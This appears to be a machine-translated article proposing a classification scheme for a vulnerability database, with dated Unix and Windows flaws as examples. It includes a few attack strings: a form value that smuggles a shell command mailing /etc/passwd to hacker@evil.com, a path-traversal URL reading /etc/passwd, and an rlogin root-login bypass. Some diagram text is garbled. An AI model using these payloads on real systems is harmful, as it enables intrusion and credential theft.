The purpose of this article is to summarize some things and solve the main problems encountered when attempting to construct a Vulnerability Database, that is, how to classify computer network vulnerabilities. Some of the ideas in this article are not mature, and some are not even satisfied with themselves, so as to communicate with colleagues who have in-depth research in this area and improve the work together.
A computer network security vulnerability has its many attributes. I think it can be summarized in the following aspects: the possible direct threats caused by the vulnerability, the causes of the vulnerability, and the severity of the vulnerability, how the vulnerability is exploited. The following sections describe the categories of vulnerabilities.
A. direct threats to the system caused by Vulnerabilities
It can be roughly divided into the following categories. In fact, the security threats caused by a system vulnerability are far from limited to its direct possibility. If attackers gain access to general users of the system, it is very likely that he will upgrade himself to the administrator privilege by exploiting the local vulnerability:
1. remote administrator permissions
Attackers do not need to log on to the local computer with an account to directly obtain the administrator privilege of the remote system. Generally, attackers can perform attacks by executing defective system daemon processes as root. Most of the vulnerabilities are caused by buffer overflow, and a few are caused by logical defects of the daemon.
Typical vulnerabilities:
IMAP4rev1 v10.190 daemon imapd's AUTHENTICATE command does not check the length when reading the parameter. A well-designed AUTH command string can be constructed to overflow the imapd buffer and run the specified command, imapd runs as root to directly obtain the root permission of the machine.
The isapi dll of WindowsNT IIS 4.0 does not perform a proper boundary check on the input URL. If you construct an ultra-long URL, You can overflow the buffer of IIS (inetinfo.exe) and execute the specified code. Since inetinfo.exe is started as a local system, you can directly obtain the Administrator permission after overflow.
Early versions of AIX 3.2 rlogind Code have authentication logic defects. With rlogin victim.com-l-froot, you can directly log on to the system as a root without providing a password.
2. Local administrator permissions
When a local account can log on to the system, attackers can obtain system administrator privileges by attacking some local defective suid programs and competing conditions.
Typical vulnerabilities:
RedHat Linux's restore is a suid program. Its execution relies on a medium RSH environment variable. By setting the environment variable PATH, the executable program in the RSH variable can run as root, to obtain the root permission of the system.
The Xsun program of Solaris 7 has a suid bit, which does not perform a valid boundary check on the input parameters. It can easily overflow its buffer and run the code we specified as root, to obtain the administrator privilege.
In Windows, attackers have the opportunity to make the Network DDE (a technology that dynamically shares data between applications on different Windows machines) the proxy executes the specified code in the security context of the local system user, so as to improve permissions and fully control the local machine.
3. Access Permissions of common users
Token Access permission, which can execute programs and access files as normal users. Attackers usually attack a daemon running as a non-root user and obtain such access permissions by means of defective cgi programs.
Typical vulnerabilities:
UBB is a forum program widely used in a variety of UNIX and Windows systems. It is implemented using PERL. Its versions earlier than 5.19 have input verification problems. By submitting carefully crafted form content, UBB can execute shell commands. Generally, a web server runs as a nobody, so a nobody shell can be obtained. For example, to submit such data: topic = '192. ubb | mail hacker@evil.com </etc/passwd | ', we can get the passwd file of the system.
The innd 2.2.2.3 news server in RedHat Linux 6.2 has a buffer overflow vulnerability. using a specially crafted news letter, the innd server can run our specified code as news, get a shell with the innd permission.
In Windows IIS 4.0-5.0, the unicodeuncode is missing. Attackers can use cmd.exe to run programs on the system with the permissions of the guest group. It is equivalent to obtaining the permissions of common users.
Iv. Permission escalation
Attackers attack some defective sgid programs locally to escalate their permissions to a non-root user. Obtaining administrator permissions can be seen as a special elevation of permissions, but they are independent of threats.
Typical vulnerabilities:
The man program in RedHat Linux 6.1 is sgid man, which has a format bug. Through its overflow attack, attackers can obtain the User Permissions Of the man group.
The write Program of Solaris 7 is sgid tty, which has a buffer overflow problem. through attacks on it, attackers can obtain the user permissions of the tty group.
In the WindowsNT system, attackers can mount a special porfile to other users in the system, so that other users can execute malicious code, sometimes even administrators.
5. Read restricted files
Attackers exploit certain vulnerabilities to read files in the system that are not permitted. These files are usually security-related. These vulnerabilities may be caused by incorrect file setting permissions, incorrect file processing by privileged processes, and accidental dump of core to dump a portion of restricted files to the core file.
Typical vulnerabilities:
The ftpd of SunOS 5.5 has a vulnerability. Generally, users can cause ftpd errors and dump a globally readable core file with a shadow file segment, so that the general user can read part of the shadow content.
The suid program pg of SuSE 6.2 has some problems with its configuration file processing. When you link pb. conf to a privileged file, you can use pb to read the content of those files.
The log file of Oracle 8.0.3 Enterprise Edition for NT 4.0 is globally readable and clear. It records the connection password and may be read by attackers.
6. Remote Denial of Service
Attackers can exploit this vulnerability to launch DoS attacks on the system without logging on, causing system or related applications to crash or lose response capabilities. These vulnerabilities are usually caused by defects or incorrect settings of the system or its daemon.
In earlier versions of Linux and BSD, the ip segment reorganization module of TCP/IP stack has defects. Attacks can cause machine crashes by sending a Special ip segment package to the system.
Netmeeting 3.01 in Windows2000 has a defect. By sending binary data streams to it, the CPU usage of the server can reach 100%.
This application can crash by sending a USER command with super-long parameters to the ftp port of AnalogX Proxy Server 4.04.
7. Local Denial of Service
Attackers can exploit this vulnerability to crash the system or application after logging on to the system. This vulnerability is mainly caused by program errors in handling unexpected situations, such as not checking whether the file exists before writing a temporary file or blindly following the link.
BSDi 3. x has a vulnerability that allows a local user to overwrite any of the system with some junk data, making the system unavailable easily.
The tmpwatch program of RedHat 6.1 has a defect, which can cause many processes in the fork () system and thus cause the system to lose the response capability.
8. remote unauthorized File Access
By exploiting these vulnerabilities, attackers can remotely access certain system files without authorization. These vulnerabilities are mainly caused by defective cgi programs that do not properly check the legality of user input, allowing attackers to access files by constructing special input.
Typical vulnerabilities:
Poll_It_SSI_v2.0.cgi vulnerabilities can enable attackers to see all the files with permissions outside the web directory, send the following request to the server to see the/etc/passwd file, http://www.targethost.com/pollit/Poll_It_v2.0.cgi? Data_dir = \ etc \ passwd % 00
Windows IIS 5.0 has a vulnerability. By sending a special head flag to it, you can obtain the asp source code, instead of the asp page after the explanation is executed.
Windows IE has many vulnerabilities that allow malicious web pages to read and browse users' local files.
9. Password Recovery
Because of the weak password encryption method, attackers can easily analyze the export order encryption method, so that attackers can obtain the password in some way and then restore the plaintext.
Typical vulnerabilities:
PassWD v1.2 in Windows is used to manage various passwords in the system and store them with URLs. However, the encrypted password encryption method is very fragile. After simple analysis, the encrypted password can be used to restore the plaintext.
Pcanywhere 9.0 uses a very fragile encryption method to encrypt passwords in transmission. As long as you are familiar with the data in transmission, it is easy to decode the plaintext password.
Browsegate is a Windows proxy firewall. Its 2.80.2 version stores the encrypted password in the configuration file and the configuration file is readable to all users. However, the encryption method is extremely fragile, the plaintext can be easily decoded.
10. Deception
Attackers can exploit this vulnerability to cheat the target system. This is usually because of some defects in system implementation.
Typical Vulnerabilities
Windows IE has a vulnerability that allows a malicious network to insert content in a window of another wind station, thus deceiving users into sensitive data.
The TCP/IP stack under Linux kernel 2.0.35 has a vulnerability, which can make it easy for attackers to perform ip address spoofing.
11. Server Information Leakage
Attackers can exploit this vulnerability to collect useful information for further attacks. This type of vulnerability is generated mainly because the system program has a defect and is generally incorrectly handled.
Typical vulnerabilities:
Windows IIS 3.0-5.0 has a vulnerability when a system request does not exist. idq ,. when The idq file is used, The machine may return an error message, which exposes The IIS installation directory information. For example, if you request http://www.microsoft.com/anything.ida, The server returns response: The IDQ file d: \ http \ anything. ida cocould not be found. These attacks may bring convenience to attackers. For example, msadc attacks are widely used. You need to know the system installation directory.
The open and closed ports in the TCP/IP stack below Linux kernel 2.1.53 have specific responses to specific packets. Attackers can use this feature to perform port secretly scanning.
Some cgi programs such as DBMan (db. cgi) have vulnerabilities that allow attackers to see some system environment variables and obtain useful information about the system.
12. Others
Although the above categories include the vast majority of vulnerabilities, there may still be some vulnerabilities that cannot be described by the above types.
B. According to the cause of the Vulnerability
Classification of vulnerabilities is another headache for classification of vulnerabilities, because different abstract levels of vulnerability research make different classifications for the same vulnerability, for the ps Race Condition Vulnerability mentioned below, it is a parameter verification error at the lowest level, because successive system calls do not check whether they process the same object, from a higher level, this is a synchronization or competition condition error. From a higher level, this is a logic error because the object may be deleted during use. So far, we have not seen a perfect classification solution, including the categories on securityfocus, which are not satisfactory. It is roughly divided into the following categories:
Input verification error
Most buffer overflow and cgi vulnerabilities are caused by the absence of proper checks on the legitimacy of the input data provided by users.
Access verification error
The vulnerability is caused by some available logic errors in the access verification part of the program, which makes it possible to bypass this access control. The earlier rlogin vulnerability in AIX mentioned above is typical.
Competitive conditions
The vulnerability occurs when the program processes objects such as files in terms of timing and synchronization. This process may have an opportunity window for attackers to exert external influences. This type of vulnerability exists in the ps commands of earlier Solaris systems. During execution, ps generates a temporary file based on its pid in/tmp, and then chown it as root, change the name to ps_data. If the temporary file can be created during the ps runtime and points to the file we are interested in, after the ps is executed, we can make any modifications to the file owned by the root user, this helps us get the root permission.
Unexpected handling error
The vulnerability is generated because the program does not take into account some unexpected situations in its implementation logic, and these unexpected situations should be taken into account. Most of the vulnerabilities in the/tmp directory that blindly follow symbolic links to overwrite files belong to this type. Example: Sco UNIX openserver/etc/sysadm. d/bin/userOsa blindly overwrites the debugging log file, and the file name is fixed. By pointing the file name to some privileged files, the system can be completely damaged.
Design Error
This category is very general. Strictly speaking, most vulnerabilities are design errors. Therefore, all vulnerabilities that cannot be put into other categories are put here first.
Configuration Error
The vulnerability is caused by incorrect System and Application configurations, software installation errors, incorrect configuration parameters, or incorrect access permissions.
Environment Error
Vulnerabilities caused by environment variable errors or malicious settings. For example, an attacker may execute a program specified by the attacker by resetting the shell's internal delimiter IFS, shell escape characters, or other environment variables. The preceding RedHat Linux dump vulnerability is of this type.
There is a certain relationship between the Threat Type of the vulnerability and the Error Type of the vulnerability. The directly related threat type and the error type are connected in a straight line. The following figure is displayed:
Remote Administrator permission
Input verification error
Local administrator permission
Access verification error
Normal user access permission
Competitive conditions
Handling errors in case of permission escalation
Read restricted files
Remote Denial of Service Design Error
Local Denial of Service
Remote unauthorized File Access
Configuration Error
Password Recovery
Spoofing environment Error
Server Information Leakage
It can be seen that input verification errors are related to almost all vulnerability threats. design errors and incorrect configurations also lead to many threats.
C. Classification of vulnerability severity
In general, the Threat Type of a vulnerability basically determines its severity. We can divide the severity into three levels: High, Medium, and low. The permissions of remote and local administrators are generally high, common user permissions, permission escalation, read of restricted files, and remote and Local Denial of Service (DoS) are generally intermediate, remote access to unauthorized files, password restoration, and spoofing, server Information Leakage generally corresponds to a low level. However, this is only the most common case. In most cases, you need to analyze the specific situation. For example, a remote denial of service vulnerability that involves the popular system itself should be of a high level. If a widely used software has a weak password problem and a password recovery vulnerability, it should also be classified as a medium-and high-level software.
D. Classification of vulnerability exploitation methods
The existence of a vulnerability is an objective fact, but the vulnerability can only be exploited in a certain way. Each vulnerability requires that the attack be in a specific position in the network space. The possible attack methods are divided into the following four categories:
Physical contact
Attackers need to be physically exposed to the target system to exploit such vulnerabilities, posing a threat to system security. Figure:
Attacker host
Host Mode
Common vulnerability exploitation methods. The attacker is a client and the target host. For example, if an attacker finds a daemon of the target host has a remote overflow vulnerability, the attacker may gain additional access to the host.
Figure:
Attack host
Client Mode
When a user accesses a host on the network, it may be attacked by malicious commands sent from the host. The client should not over-Trust the host. For example, web Browser IE has many vulnerabilities, which can enable some malicious websites to use html tags to execute programs or read and write files in the client that browses.
Figure:
Attack
Client host
Man-in-the-middle Mode
When an attacker is located in a location that can observe or intercept communication between two machines, the attacker can be considered as a man in the middle. In many cases, valuable information is transmitted in plain text between hosts. Therefore, attackers can easily attack other hosts. For the implementation of some public key encryption, attackers can intercept and replace the key as two nodes on the network to bypass this restriction.
Figure:
Communication
Host
Listening or tampering
Attacker
This article provides a rough classification of network security vulnerabilities. This is far from a perfect solution. If you are interested, please feel free to contact us.
Some of the references I have read: http://www.securityfocus.com/external/http://seclab.cs.ucdavis.edu/projects/vulnerabilities/scriv/index.html
Http://www.securityfocus.com/data/library/compvuln_draft.pdf
Of course, there are:
Http://www.xfocus.org/html/query_exploit.html
You can find all the vulnerability examples mentioned in this article.